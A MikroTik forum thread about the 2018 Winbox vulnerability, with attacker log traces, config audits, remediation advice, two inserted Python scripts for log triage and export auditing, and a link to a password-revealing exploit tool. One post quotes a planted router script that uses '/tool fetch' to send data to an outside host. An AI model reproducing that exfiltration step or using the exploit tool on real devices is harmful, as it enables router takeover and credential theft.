Jul/28/2018 08:13:17 system,info script removed from scheduler by macgaiver
Jul/28/2018 08:13:17 system,info script removed by macgaiver
Jul/28/2018 08:13:17 system,info filter rule changed by macgaiver
Jul/28/2018 08:13:17 system,info filter rule changed by macgaiver
Jul/28/2018 08:13:17 system,info filter rule changed by macgaiver
Jul/28/2018 08:13:17 system,info script removed from scheduler by macgaiver
Jul/28/2018 08:13:17 system,info script removed by macgaiver

Aug/05/2018 11:31:15 system,info,account user macgaiver logged in from 95.154.216.151 via winbox
Aug/05/2018 11:31:16 system,info socks acl entry added by macgaiver
Aug/05/2018 11:31:16 system,info socks config changed by macgaiver
Aug/05/2018 11:31:16 system,info new script added by macgaiver
Aug/05/2018 11:31:16 system,info new script scheduled by macgaiver
Aug/05/2018 11:31:16 system,info new script added by macgaiver
Aug/05/2018 11:31:16 system,info new script scheduled by macgaiver
Aug/05/2018 11:31:16 system,info new script added by macgaiver
Aug/05/2018 11:31:16 system,info,account user macgaiver logged out from 95.154.216.151 via winbox
Aug/05/2018 11:31:16 system,info new script scheduled by macgaiver
Aug/05/2018 11:31:47 system,info script removed from scheduler by macgaiver
Aug/05/2018 11:31:47 system,info filter rule changed by macgaiver
Aug/05/2018 11:31:47 system,info script removed by macgaiver
Aug/05/2018 11:31:47 system,info script removed by macgaiver
Aug/05/2018 11:31:47 system,info filter rule changed by macgaiver
Aug/05/2018 11:31:47 system,info script removed from scheduler by macgaiver
Aug/05/2018 11:31:47 system,info filter rule changed by macgaiver
Aug/05/2018 11:31:47 system,info script removed from scheduler by macgaiver
Aug/05/2018 11:31:47 system,info script removed by macgaiver

Aug/19/2018 23:22:47 system,info,account user macgaiver logged in from 95.154.216.151 via winbox
Aug/19/2018 23:22:47 system,info socks acl entry added by macgaiver
Aug/19/2018 23:22:47 system,info socks config changed by macgaiver
Aug/19/2018 23:22:47 system,info new script added by macgaiver
Aug/19/2018 23:22:47 system,info new script scheduled by macgaiver
Aug/19/2018 23:22:47 system,info new script added by macgaiver
Aug/19/2018 23:22:47 system,info,account user macgaiver logged out from 95.154.216.151 via winbox
Aug/19/2018 23:22:47 system,info new script scheduled by macgaiver
Aug/19/2018 23:23:17 system,info script removed from scheduler by macgaiver
Aug/19/2018 23:23:17 system,info filter rule changed by macgaiver
Aug/19/2018 23:23:17 system,info script removed by macgaiver
Aug/19/2018 23:23:17 system,info filter rule changed by macgaiver
Aug/19/2018 23:23:17 system,info filter rule changed by macgaiver
Aug/19/2018 23:23:17 system,info script removed from scheduler by macgaiver
Aug/19/2018 23:23:17 system,info script removed by macgaiver

Sep/03/2018 23:03:03 system,info,account user macgaiver logged in from 109.172.76.49 via winbox
Sep/03/2018 23:03:07 system,info,account user macgaiver logged in from 109.172.76.49 via telnet
Sep/03/2018 23:03:11 system,info ip service changed by macgaiver
Sep/03/2018 23:03:13 system,info ip service changed by macgaiver
Sep/03/2018 23:03:14 system,info,account user macgaiver logged out from 109.172.76.49 via winbox
Sep/03/2018 23:03:14 system,info,account user macgaiver logged out from 109.172.76.49 via telnet
Sep/03/2018 23:03:16 system,info,account user macgaiver logged in from 159.224.52.96 via api
Sep/03/2018 23:03:20 system,info socks config changed by macgaiver
Sep/03/2018 23:03:21 system,info dns changed by macgaiver
Sep/03/2018 23:03:21 system,info item changed by macgaiver
Sep/03/2018 23:03:23 system,info script removed by macgaiver
Sep/03/2018 23:03:24 system,info script removed from scheduler by macgaiver
Sep/03/2018 23:03:25 system,info socks config changed by macgaiver
Sep/03/2018 23:03:26 system,info http proxy settings changed by macgaiver
Sep/03/2018 23:03:37 wireless,info 60:A4:D0:05:67:CB@wlan1: disconnected, disabling
Sep/03/2018 23:03:37 system,info,account user macgaiver logged out from 159.224.52.96 via api
Sep/03/2018 23:03:37 system,info,account user macgaiver logged out from 159.224.52.96 via api
Sep/03/2018 23:03:43 system,info verified routeros-mipsbe-6.42.7.npk
Sep/03/2018 23:03:43 system,info installed routeros-mipsbe-6.42.7
Sep/03/2018 23:03:44 system,info router rebooted

None of them was me :), including the last one that cleared everything up and upgraded the router (thanks, to whomever that was)
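
The log excerpt above shows the pattern worth alerting on: a login from an unexpected address followed within a second or two by SOCKS, script and scheduler changes, then a logout. The script below is an added example for this thread (not MikroTik's or any poster's code) that parses lines in that exact RouterOS log format, ties every "... by <user>" change to that user's latest login, and flags sessions from outside a trusted prefix list; the sample lines are constructed in the same format with documentation addresses.

```python
"""Triage RouterOS log lines for the compromise pattern shown in the post above.

Example code added for this thread, not MikroTik's or any poster's code.
The sample lines are constructed in the same format as the posted logs.
"""
import re
from dataclasses import dataclass, field
from datetime import datetime
from ipaddress import ip_address, ip_network
from typing import List, Optional

# "system,info" messages RouterOS writes when these parts of the config change.
# Each is legitimate on its own; a burst of them from a strange IP is the tell.
INDICATORS = frozenset({
    "socks config changed", "socks acl entry added",
    "new script added", "new script scheduled",
    "filter rule changed", "ip service changed",
    "dns changed", "http proxy settings changed",
})

LINE_RE = re.compile(r"^(?P<date>\w{3}/\d{2}/\d{4}) (?P<time>\d{2}:\d{2}:\d{2}) "
                     r"(?P<topics>[\w,]+) (?P<msg>.*)$")
LOGIN_RE = re.compile(r"^user (?P<user>\S+) logged in from (?P<ip>\S+) via (?P<svc>\S+)$")
LOGOUT_RE = re.compile(r"^user (?P<user>\S+) logged out from (?P<ip>\S+) via (?P<svc>\S+)$")
CHANGE_RE = re.compile(r"^(?P<what>.+?) by (?P<user>\S+)$")


@dataclass
class Session:
    user: str
    ip: str
    service: str
    start: datetime
    end: Optional[datetime] = None
    changes: List[str] = field(default_factory=list)

    def indicators(self) -> List[str]:
        return [c for c in self.changes if c in INDICATORS]

    def seconds(self) -> float:
        return ((self.end or self.start) - self.start).total_seconds()


def build_sessions(lines) -> List[Session]:
    """Attribute every '<what> by <user>' line to that user's latest login.

    RouterOS can log a change with the same timestamp as, or after, the logout
    line (visible in the post above), so changes are tied to the latest login
    rather than only to sessions that are still open.
    """
    sessions, latest = [], {}
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(f"{m['date']} {m['time']}", "%b/%d/%Y %H:%M:%S")
        msg = m["msg"]
        if login := LOGIN_RE.match(msg):
            s = Session(login["user"], login["ip"], login["svc"], ts)
            sessions.append(s)
            latest[s.user] = s
        elif logout := LOGOUT_RE.match(msg):
            s = latest.get(logout["user"])
            if s and s.end is None:
                s.end = ts
        elif change := CHANGE_RE.match(msg):
            s = latest.get(change["user"])
            if s:
                s.changes.append(change["what"])
    return sessions


def is_trusted(ip: str, trusted) -> bool:
    try:
        return any(ip_address(ip) in net for net in trusted)
    except ValueError:          # MAC-Winbox logins carry a MAC address, not an IP
        return False


def suspicious_sessions(lines, trusted_prefixes, min_indicators=2) -> List[Session]:
    """Sessions from outside the trusted prefixes with a burst of indicators."""
    trusted = [ip_network(p) for p in trusted_prefixes]
    return [s for s in build_sessions(lines)
            if not is_trusted(s.ip, trusted) and len(s.indicators()) >= min_indicators]


# Constructed sample in the format of the logs posted above (documentation IPs).
SAMPLE_LOG = """\
Aug/05/2018 11:31:15 system,info,account user admin logged in from 203.0.113.7 via winbox
Aug/05/2018 11:31:16 system,info socks acl entry added by admin
Aug/05/2018 11:31:16 system,info socks config changed by admin
Aug/05/2018 11:31:16 system,info new script added by admin
Aug/05/2018 11:31:16 system,info new script scheduled by admin
Aug/05/2018 11:31:16 system,info,account user admin logged out from 203.0.113.7 via winbox
Aug/05/2018 11:31:16 system,info new script scheduled by admin
Aug/06/2018 09:00:00 system,info,account user admin logged in from 192.168.88.10 via winbox
Aug/06/2018 09:04:12 system,info filter rule changed by admin
Aug/06/2018 09:05:30 system,info,account user admin logged out from 192.168.88.10 via winbox
"""

if __name__ == "__main__":
    for s in suspicious_sessions(SAMPLE_LOG.splitlines(), ["192.168.88.0/24"]):
        print(f"{s.start} {s.user}@{s.ip} via {s.service}: "
              f"{len(s.indicators())} indicators in {s.seconds():.0f}s")
```

The same parser runs over a remote syslog feed; the legitimate admin session from the LAN in the sample is not flagged because a single filter change from a trusted prefix is below the indicator threshold.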

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 10, 2018 1:01 pm
by msatter
Our Dutch Prime Minister has also a driver license made in Poland on his name.

Darn the advertisement is removed.

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 10, 2018 1:13 pm
by BartoszP
@msatter: Is it a joke or not?

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 10, 2018 6:47 pm
by wpeople
May I ask, how is it possible for the attacker to load up the known scripts and modify the firewall, socks proxy, etc.
if in IP/Services only winbox and ssh are allowed, but they are limited to connecting from known prefixes?

It has even happened in 6.42.1 or 6.42.3

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 10, 2018 9:06 pm
by 43north
May I ask, how is it possible for the attacker to load up the known scripts and modify the firewall, socks proxy, etc.
if in IP/Services only winbox and ssh are allowed, but they are limited to connecting from known prefixes?

It has even happened in 6.42.1 or 6.42.3
I have understood that even if you limit the connections in the IP/Services to specific addresses that it still allows the attacker close enough to execute the exploit. I have created firewall rules for the default 8291 and also for the port that I changed my Winbox access to. This is the only sure way in my mind that they won't be able to even reach IP/Services.

Anyone please correct me if I am wrong on these points.

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 10, 2018 9:11 pm
by msatter
@msatter: Is it a joke or not?
https://www.rdw.nl/particulier/nieuws/2 ... -rijbewijs

The internet is full of news items about Rutte rijbewijs

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 11, 2018 10:08 am
by Deantwo
May I ask, how is it possible for the attacker to load up the known scripts and modify the firewall, socks proxy, etc.
if in IP/Services only winbox and ssh are allowed, but they are limited to connecting from known prefixes?

It has even happened in 6.42.1 or 6.42.3
Without knowing exactly what you had configured on it, it is hard to know what was and wasn't possible.
Also if you didn't change your password after upgrading, anyone that may have exploited your router before you upgraded might still have access.

I suggest you email support@mikrotik.com (see), they will be able to look through your configuration and see if it is a configuration issue or a software bug.

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 11, 2018 12:08 pm
by wpeople
May I ask, how is it possible for the attacker to load up the known scripts and modify the firewall, socks proxy, etc.
if in IP/Services only winbox and ssh are allowed, but they are limited to connecting from known prefixes?

It has even happened in 6.42.1 or 6.42.3
Without knowing exactly what you had configured on it, it is hard to know what was and wasn't possible.
Also if you didn't change your password after upgrading, anyone that may have exploited your router before you upgraded might still have access.

I suggest you email support@mikrotik.com (see), they will be able to look through your configuration and see if it is a configuration issue or a software bug.
Even if he knows the password BUT the service is LIMITED to my IP prefixes, how the hell can he control my device?!
The only way this is possible is if Mikrotik made the service check the connecting IP address AFTER authentication.

If the service does NOT allow connections from anybody but the listed IPs, the packets from unlisted sources should not reach the application. I think.
Please correct me, or accept that there is another piece of sh!t found in the pancake...

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 11, 2018 1:20 pm
by normis
Did you always have the IP SERVICES limitation? The hack could have happened last year. Is it correctly set up, and was it always?

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 11, 2018 1:27 pm
by wpeople
Yes! 95% of those routers have had the ip/services limitation since installation! (the other 5% are customer radios turned from bridge into router, due to customer router issues)

90% of those 95% devices have remote syslog as well - but for the moment I had no time to look them up. Probably I will find something, because the hacker set the logging limit to 1 line :-)

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 11, 2018 1:30 pm
by normis
How about the possibility of a staff member that used the attack script from the allowed IP range?
IP services work well; there is zero evidence that this limit can be overcome in some way.

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 11, 2018 2:36 pm
by Deantwo
May I ask, how is it possible for the attacker to load up the known scripts and modify the firewall, socks proxy, etc.
if in IP/Services only winbox and ssh are allowed, but they are limited to connecting from known prefixes?

It has even happened in 6.42.1 or 6.42.3
Without knowing exactly what you had configured on it, it is hard to know what was and wasn't possible.
Also if you didn't change your password after upgrading, anyone that may have exploited your router before you upgraded might still have access.

I suggest you email support@mikrotik.com (see), they will be able to look through your configuration and see if it is a configuration issue or a software bug.
Even if he knows the password BUT the service is LIMITED to my IP prefixes, how the hell can he control my device?!
The only way this is possible is if Mikrotik made the service check the connecting IP address AFTER authentication.

If the service does NOT allow connections from anybody but the listed IPs, the packets from unlisted sources should not reach the application. I think.
Please correct me, or accept that there is another piece of sh!t found in the pancake...
Check your logs to see where the attacker accessed from, it could be a compromised machine from a trusted IP-address range. We can't really help you here without more information.

Maybe better if you make a new thread and post your configuration (passwords and IPs obscured of course) so we can see what might be wrong and help you there. Instead of polluting this thread with baseless accusations and misinformation.

I would however suggest to email support@mikrotik.com, since if it is a real issue then they can escalate it to the right department. This would however not satisfy my curiosity.

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 11, 2018 2:45 pm
by macgaiver
In some cases it was reported that a device got infected from another infected device on the same (trusted) network.

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 11, 2018 6:09 pm
by tiktakmik
CHR was hacked. I got the new password from the disk image and password recovery tools.
Now I have changed the hacker's configuration, removed socks, changed the password again, but didn't clear the disk image and license.

See screenshot of winbox interface : http://prntscr.com/kt6f9y


1. What is this "job" on the image? Is it the hacker's job, or the system's (like ospf)?
There is no such task in my usual configuration

here is the full export (a little obfuscated)
/export
# sep/11/2018 17:50:21 by RouterOS 6.43
# software id =
#
#
#
/interface gre
add !keepalive local-address=185.31.1.2 name=to_S remote-address=46.0.1.1
add !keepalive local-address=185.31.1.2 name=to_X remote-address=178.215.1.1
/interface wireless security-profiles
set [ find default=yes ] supplicant-identity=MikroTik
/routing ospf instance
set [ find default=yes ] router-id=192.168.123.0
/snmp community
set [ find default=yes ] addresses=0.0.0.0/0 name=public4444
/ip address
add address=185.31.1.2/24 interface=ether1 network=185.31.1.0
add address=192.168.123.254/24 interface=ether2 network=192.168.123.0
add address=10.10.10.26/30 interface=to_Xl network=10.10.10.24
add address=20.20.20.1/30 interface=to_Y network=20.20.20.0
/ip dhcp-client
add disabled=no interface=ether1
/ip dns
set allow-remote-requests=yes servers=8.8.8.8
/ip firewall filter
add action=fasttrack-connection chain=forward connection-state=established,related
add action=accept chain=forward connection-state=established,related
add action=accept chain=input connection-state=established,related
add action=drop chain=input dst-port=53 in-interface=ether1 protocol=udp
add action=drop chain=input dst-port=53 in-interface=ether1 protocol=tcp
/ip firewall nat
add action=masquerade chain=srcnat out-interface=ether1
add action=netmap chain=dstnat comment="HTTPS Nginx" dst-port=443 in-interface=ether1 protocol=tcp to-addresses=192.168.123.1 to-ports=443
/ip firewall service-port
set ftp disabled=yes
set tftp disabled=yes
set irc disabled=yes
set h323 disabled=yes
set sip disabled=yes
set udplite disabled=yes
set dccp disabled=yes
set sctp disabled=yes
/ip route
add distance=1 gateway=185.31.1.1
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set ssh port=2001
set api disabled=yes
set api-ssl disabled=yes
/routing ospf network
add area=backbone network=10.10.10.24/30
add area=backbone network=192.168.123.0/24
add area=backbone network=20.20.20.0/30
/system clock
set time-zone-name=Europe/Moscow
/system ntp client
set enabled=yes primary-ntp=216.229.0.179 secondary-ntp=80.240.216.155
Can hackers also put backdoors into linux?

2. How can I reinstall the CHR license on a new disk image?

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 11, 2018 8:06 pm
by Deantwo
here is the full export (a little obfuscated)
/export
# sep/11/2018 17:50:21 by RouterOS 6.43
# software id =
#
#
#
/interface gre
add !keepalive local-address=185.31.1.2 name=to_S remote-address=46.0.1.1
add !keepalive local-address=185.31.1.2 name=to_X remote-address=178.215.1.1
/interface wireless security-profiles
set [ find default=yes ] supplicant-identity=MikroTik
/routing ospf instance
set [ find default=yes ] router-id=192.168.123.0
/snmp community
set [ find default=yes ] addresses=0.0.0.0/0 name=public4444
/ip address
add address=185.31.1.2/24 interface=ether1 network=185.31.1.0
add address=192.168.123.254/24 interface=ether2 network=192.168.123.0
add address=10.10.10.26/30 interface=to_Xl network=10.10.10.24
add address=20.20.20.1/30 interface=to_Y network=20.20.20.0
/ip dhcp-client
add disabled=no interface=ether1
/ip dns
set allow-remote-requests=yes servers=8.8.8.8
/ip firewall filter
add action=fasttrack-connection chain=forward connection-state=established,related
add action=accept chain=forward connection-state=established,related
add action=accept chain=input connection-state=established,related
add action=drop chain=input dst-port=53 in-interface=ether1 protocol=udp
add action=drop chain=input dst-port=53 in-interface=ether1 protocol=tcp
/ip firewall nat
add action=masquerade chain=srcnat out-interface=ether1
add action=netmap chain=dstnat comment="HTTPS Nginx" dst-port=443 in-interface=ether1 protocol=tcp to-addresses=192.168.123.1 to-ports=443
/ip firewall service-port
set ftp disabled=yes
set tftp disabled=yes
set irc disabled=yes
set h323 disabled=yes
set sip disabled=yes
set udplite disabled=yes
set dccp disabled=yes
set sctp disabled=yes
/ip route
add distance=1 gateway=185.31.1.1
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set ssh port=2001
set api disabled=yes
set api-ssl disabled=yes
/routing ospf network
add area=backbone network=10.10.10.24/30
add area=backbone network=192.168.123.0/24
add area=backbone network=20.20.20.0/30
/system clock
set time-zone-name=Europe/Moscow
/system ntp client
set enabled=yes primary-ntp=216.229.0.179 secondary-ntp=80.240.216.155
Yeah, that configuration is not secure. Wide open to the internet and attackers.
At least missing a couple of block rules in the firewall filter. For example:
/ip firewall filter
add action=accept chain=forward in-interface=ether1 connection-state=established,related
add action=accept chain=input in-interface=ether1 connection-state=established,related
add action=drop chain=forward in-interface=ether1
add action=drop chain=input in-interface=ether1
But suggest you read the manual page about securing your router: https://wiki.mikrotik.com/wiki/Manual:S ... our_Router
Can hackers also put backdoors into linux?
No, they cannot access the linux operating system of the router, unless you have rooted the router yourself already, which you really should not do.
Unless you were running a version of RouterOS that is older than v6.38.5, see: viewtopic.php?f=21&t=132499
2. How can I reinstall the CHR license on a new disk image?
I suggest you email support@mikrotik.com with your license issue.
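
The gap Deantwo points out in the export quoted above (no catch-all drop in the input chain, management services reachable from anywhere, an SNMP community open to 0.0.0.0/0) can be checked mechanically. The script below is an added example for this thread, not MikroTik's or any poster's code: it parses the text of a RouterOS /export into sections and key=value attributes and reports those three exposures; the sample export is constructed in the style of the one posted, and the service defaults it assumes for services the export does not mention are an assumption about RouterOS 6.

```python
"""Audit a RouterOS '/export' for the exposure discussed above.

Example code added for this thread, not MikroTik's or any poster's code. An
export only lists non-default values, so services it does not mention are
assumed to keep the RouterOS 6 defaults given below (an assumption).
"""
import shlex
from collections import defaultdict

# Assumed RouterOS 6 '/ip service' defaults: name -> enabled.
SERVICE_DEFAULTS = {"telnet": True, "ftp": True, "www": True, "ssh": True,
                    "www-ssl": False, "api": True, "api-ssl": True, "winbox": True}
# A drop in the input chain is catch-all when it matches on nothing narrower
# than the inbound interface.
CATCH_ALL_KEYS = {"action", "chain", "in-interface", "in-interface-list", "comment"}


def parse_export(text):
    """Return {section: [(verb, target, attrs)]}; target is the item name in
    'set ssh port=2001' and None for 'add ...' and 'set [ find ... ]' lines."""
    sections, current = defaultdict(list), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):
            current = line
            continue
        tokens = shlex.split(line)                  # handles comment="HTTPS Nginx"
        verb, rest, target, attrs = tokens[0], tokens[1:], None, {}
        if rest and rest[0] == "[":                 # set [ find ... ] key=value ...
            rest = rest[rest.index("]") + 1:]
        elif verb == "set" and rest and "=" not in rest[0] and not rest[0].startswith("!"):
            target, rest = rest[0], rest[1:]
        for tok in rest:
            if tok.startswith("!"):                 # negated flag, e.g. !keepalive
                attrs[tok[1:]] = None
            elif "=" in tok:
                key, value = tok.split("=", 1)
                attrs[key] = value
        sections[current].append((verb, target, attrs))
    return sections


def audit(text):
    cfg = parse_export(text)
    findings = []
    catch_all = [a for _, _, a in cfg.get("/ip firewall filter", [])
                 if a.get("chain") == "input" and a.get("action") in ("drop", "reject")
                 and a.get("disabled") != "yes" and set(a) <= CATCH_ALL_KEYS]
    if not catch_all:
        findings.append("input chain has no catch-all drop: every service is reachable from the WAN")
    enabled, restricted = dict(SERVICE_DEFAULTS), set()
    for _, name, a in cfg.get("/ip service", []):
        if name is None:
            continue
        if "disabled" in a:
            enabled[name] = a["disabled"] != "yes"
        if a.get("address"):
            restricted.add(name)
    for name in sorted(enabled):
        if enabled[name] and name not in restricted:
            findings.append(f"service {name} enabled with no address restriction")
    # Only bites once SNMP itself is enabled, but an open community is worth flagging.
    for _, _, a in cfg.get("/snmp community", []):
        if a.get("addresses") in ("0.0.0.0/0", "::/0"):
            findings.append(f"snmp community {a.get('name', '?')} allows queries from {a['addresses']}")
    return findings


# Constructed sample in the style of the export quoted above.
SAMPLE_EXPORT = """\
/snmp community
set [ find default=yes ] addresses=0.0.0.0/0 name=public4444
/ip firewall filter
add action=accept chain=input connection-state=established,related
add action=drop chain=input dst-port=53 in-interface=ether1 protocol=udp
add action=drop chain=input dst-port=53 in-interface=ether1 protocol=tcp
/ip firewall nat
add action=masquerade chain=srcnat out-interface=ether1
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set ssh port=2001
set api disabled=yes
set api-ssl disabled=yes
"""
# Same export plus the input drop Deantwo suggests and the remaining management
# services limited to the LAN prefix (the SNMP community is left as it was).
HARDENED_EXPORT = SAMPLE_EXPORT + """\
/ip firewall filter
add action=drop chain=input in-interface=ether1
/ip service
set ssh address=192.168.123.0/24
set winbox address=192.168.123.0/24
"""

if __name__ == "__main__":
    for label, text in (("as posted", SAMPLE_EXPORT), ("hardened", HARDENED_EXPORT)):
        print(label, audit(text) or ["no findings"])
```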

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 11, 2018 10:16 pm
by tiktakmik
Yeah, that configuration is not secure. Wide open to the internet and attackers.
Yes. And this is fine. Everyone has his own vision of comfort and safety.
What about my question? who starts this job?
2. How can I reinstall the CHR license on a new disk image?

I suggest you email support@mikrotik.com with your license issue.
I don't have access to the email or account. Only a disk image with a self-updated license.
Any other suggestion?

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 11, 2018 11:01 pm
by Deantwo
2. How can I reinstall the CHR license on a new disk image?
I suggest you email support@mikrotik.com with your license issue.
I don't have access to the email or account. Only a disk image with a self-updated license.
Any other suggestion?
Email support@mikrotik.com, they can help you with all your questions.

Re: Winbox vulnerability: please upgrade

Posted: Tue Sep 11, 2018 11:20 pm
by djradiator
Hello everybody,

If somebody will need, I just created a Windows App for showing passwords for impacted MK versions based on the original Python script (https://github.com/BasuCert/WinboxPoC):
https://github.com/msterusky/WinboxExploit/releases

It's a one-time application, and I don't plan any extensions or further versions.
The app doesn't contain an implementation for mac-winbox, and works only on the IP layer.

Please, feel free to reuse it or adjust as you need.


Thanks,
Martin

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 12, 2018 1:37 am
by sid5632
Yeah, that configuration is not secure. Wide open to the internet and attackers.
Yes. And this is fine. Everyone has his own vision of comfort and safety.
You got hacked and started asking questions. Then when someone gives you a sensible answer and tells you where you went wrong, you disagree with them and stick your head in the sand.
You ARE a fool.

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 12, 2018 9:36 am
by tiktakmik

You ARE a fool.
If this is a reasonable answer, then I invite you to go to Western Siberia in the winter to restore access to the router.


Just answer me, what kind of job is running on this configuration?

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 12, 2018 9:40 am
by normis
Let me understand this.

1. You have an open router with no firewall
2. You ask why somebody connected to it

Correct?

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 12, 2018 10:03 am
by Deantwo
If this is a reasonable answer, then I invite you to go to Western Siberia in the winter to restore access to the router.
Even better reason to have it secure, and a plan for how to access it remotely when you finally do secure it correctly.
The manual page I linked you to has examples on how to do all of that. I urge you to give it a read if you haven't already, but even so reading it again is a good idea. I might need to read it all again myself.
Just answer me, what kind of job is running on this configuration?
From the picture and config you supplied us, we can't tell you.
That is why I told you to email support@mikrotik.com instead. Maybe they can see what it is doing if you make a supout?

I guess that it could be an infinitely looping mischievous script that wakes up every specific interval and changes the configuration somehow or sends out mischievous traffic. The log could give some hints as to what it is doing, or maybe the System->History.
But if you are running RouterOS v6.43, I don't even see how this is related to this topic at all. Change your password so people that may have hacked your router before can't access it again, and clean up any possible mischievous configuration or scripts. Then implement a more secure firewall and more secure remote access.

Either way, us sitting here and guessing doesn't help anyone. Best not to go too off-topic in this thread with assumptions and speculations. Email support@mikrotik.com and they will be able to help you more closely, or make a new thread so we can all discuss your issue better.

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 12, 2018 10:35 am
by tiktakmik
Let me understand this.

1. You have an open router with no firewall
2. You ask why somebody connected to it

Correct?
No. Read everything from the beginning.
I am asking what kind of job is running without any config in the scheduler or watchdog.

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 12, 2018 10:43 am
by normis
Sorry I don't understand that question. Try to re-phrase it.

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 12, 2018 10:50 am
by Deantwo
Sorry I don't understand that question. Try to re-phrase it.
He is talking about what he said in viewtopic.php?p=685673#p685509: a job is shown to be running, yet the configuration doesn't appear to have any scripts in it.
But as I said, from the picture and config alone, I doubt we can tell him what it is. Unless you happen to know anything else that appears in the job list other than scripts.

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 12, 2018 10:53 am
by normis
This is normal, if you open a Terminal. There is no hacker here.

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 12, 2018 10:57 am
by tiktakmik
This is normal, if you open a Terminal. There is no hacker here.
I have another similar configuration of CHR (not previously hacked). Before asking, I checked there and didn't see any jobs.
So I suspect a hacker backdoor.

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 12, 2018 11:01 am
by tiktakmik
This is normal, if you open a Terminal. There is no hacker here.
ok. confirm this!


now we can go on to discuss the journey in winter

Re: Winbox vulnerability: please upgrade

Posted: Wed Sep 12, 2018 11:13 am
by Deantwo
This is normal, if you open a Terminal. There is no hacker here.
I feel stupid for forgetting this detail... knew I was forgetting something.
Anyway, thanks for the confirmation.

Re: Winbox vulnerability: please upgrade

Posted: Thu Sep 13, 2018 7:02 pm
by wpeople
Just found this on a customer router (where winbox was open for world, running 6.42.3) in system/scripts

{/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx ... artextpass")}

Re: Winbox vulnerability: please upgrade

Posted: Sat Sep 15, 2018 9:09 pm
by spacemind
....

Re: Winbox vulnerability: please upgrade

Posted: Sat Sep 15, 2018 10:14 pm
by BartoszP
What do you want to say? Have you example of hacked 6.42.7 or are you just guessing and making noise?

Re: Winbox vulnerability: please upgrade

Posted: Sat Sep 15, 2018 10:29 pm
by spacemind
post deleted .... contacted support instead.

Re: Winbox vulnerability: please upgrade

Posted: Sat Sep 15, 2018 10:37 pm
by kobuki
What do you want to say? Have you example of hacked 6.42.7 or are you just guessing and making noise?
One of a client's main routers with ros 6.42.7 has been compromised and a lot of traffic was being generated before I replaced it with a new one.

Ros 6.42.7 with only the winbox port open to the web, and the other network routers and access points including swos switches are all compromised except the ones with ros 6.18.

These crazy security holes....
I'm not advocating for Mikrotik but please stop this. It's very annoying and I'm really not sure if you're just trolling, speaking on behalf of a competitor or you have a genuine case of hacking. Tell us all details, like how you've checked there were no default empty or easy to guess passwords, proxy service or firewall rules enabled that make it easy to use the router as a starting point for hackers, etc. If you're not 100% positive the break-in is a result of a new security hole then you should consider removing your post and rethink what you post here. We're all here to share info on all the existing exploits and how to deal with them. If you happen to find a genuine one, make a support request with a supout file and file a support request instead.

Re: Winbox vulnerability: please upgrade

Posted: Sat Sep 15, 2018 11:01 pm
by spacemind
kobuki, I'm using Mikrotik since version 2; I watched the huge improvement in Mikrotik hardware. I have thousands of deployed mikrotik networks since 2001.

thank you for your suggestion but I'm getting a bit tired of this magnificent hardware with crazy and buggy software.

I replaced a few hacked routers and will investigate what happened.

Bye :)
R.

Re: Winbox vulnerability: please upgrade

Posted: Sun Sep 16, 2018 9:18 pm
by zvekyf
is there maybe a plan to add auto update option and set that as default option?
There are many routers which will never be updated or until something real bad happens.

Also maybe to add option to auto update only security fixes.

This way every router will be immediately patched/updated (unmanaged) and IT folks (managed) can select manual updates but set auto update for security fixes.

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 17, 2018 10:51 am
by Deantwo
is there maybe a plan to add auto update option and set that as default option?
There are many routers which will never be updated or until something real bad happens.
The issue with doing that is that users won't know what is happening.
For example, if they notice their internet going down their first instinct might be to reboot the router. Rebooting the router while it is in the middle of installing an upgrade might break the router. And the average user will not want to learn how to use NetInstall.

It isn't MikroTik's job to update your router for you, it is only their job to make you able to update it easily and quickly.
All it takes is a simple scheduler script to make it auto update, and if you make it use the "bugfix"/"long-term" channel it will only update when it is an important update.

Maybe an example of such an auto update scheduler script should be added to the wiki/manual?

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 17, 2018 11:07 am
by mrz

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 17, 2018 11:27 am
by Deantwo
Example is already in the manual:
https://wiki.mikrotik.com/wiki/Manual:U ... to-upgrade
Ah very nice, thanks.
But it would be nice if the example also included "set channel=bugfix", since that took me a moment to find. I can't even see the word "channel" being mentioned at all on the whole page.

For example:
/system package update
set channel=bugfix
check-for-updates once
:delay 1s;
:if ( [get status] = "New version is available" ) do={ install }

EDIT: Appears to be called "release chains" on the page, here: https://wiki.mikrotik.com/wiki/Manual:U ... ase_chains

Re: Winbox vulnerability: please upgrade

Posted: Mon Sep 17, 2018 11:57 am
by spacemind

It isn't MikroTik's job to update your router for you, it is only their job to make you able to update it easily and quickly.
Sorry to disagree but you're wrong. It is MIKROTIK's job to update our routers' software when a critical vulnerability is on the way.

If we buy Mikrotik's powerful routers we must have this critical support.

